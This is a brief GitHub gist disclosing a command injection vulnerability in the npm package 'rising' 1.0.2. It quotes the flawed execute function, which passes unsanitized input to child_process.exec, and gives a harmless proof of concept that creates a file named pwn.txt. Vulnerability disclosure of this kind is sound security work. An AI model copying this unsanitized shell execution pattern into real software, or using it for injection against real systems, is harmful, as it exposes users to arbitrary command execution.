Skip to content

Instantly share code, notes, and snippets.

@Splint3r7
Last active November 11, 2023 14:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Splint3r7/63586940c4d313389c8f1ca1b00cd9bf to your computer and use it in GitHub Desktop.
Save Splint3r7/63586940c4d313389c8f1ca1b00cd9bf to your computer and use it in GitHub Desktop.
Command Injection Vulnerability in Rising 1.0.2

Command Injection Vulnerability in Rising 1.0.2

Command injection vulnerability was identified in NPM package rising version 1.0.2

Resources:

Code Analysis Background

child_process has been utilized in the plugin to execute the command. A user input has been used which is not being sanitized, which allows an attacker to perform command injection through rising package.

below is the code snippet that executes command without sanitizing it.

const child_process = require('child_process')
// other code
/**
 * Execute a (shell) command.
 * 
 * @param String cmd Your command.
 */ 
function execute(cmd) {
    child_process.exec(cmd)
}

Exploitation:

POC:

const rising = require('./index.js'); 

rising.println('Hello, world!');
rising.execute('touch pwn.txt');

Observer a new file pwn.txt will be created in the same directory.

Author

Hassan Khan Yusufzai

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment